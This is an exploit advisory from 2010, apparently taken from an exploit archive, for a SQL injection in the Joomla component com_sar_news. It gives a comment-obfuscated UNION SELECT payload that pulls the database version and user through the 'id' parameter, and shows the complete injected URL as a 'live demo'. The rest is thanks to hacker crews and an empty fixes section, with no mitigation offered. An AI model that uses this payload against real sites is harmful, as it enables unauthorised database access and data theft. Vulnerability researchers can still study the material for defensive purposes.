Joomla Component com_sar_news SQL Injection Vulnerability
2010-06-03 16:03:13# Exploit Title: Joomla com_sar_news SQL Injection vulnerability
# Date: 02 juni 2010
# Author: LyNx ([email protected])
# Platform / Tested on: Windows XP 2
# category: webapps/0day
# Code :
==== SQLI EXPLOIT ====
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
==== VULN IN HERE ====
http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering
==== LIVE DEMO ====
http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering
[x]-------------------------------------------------------------------
Thanks To :
system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,
virgi, ranggamaggic, shadowsmaker
suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia
hacker and all outsider...
[x]-------------------------------------------------------------------
[x] www.indonesianhacker.or.id
[x] kuat kita bersinar
[x]-------------------------------------------------------------------
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.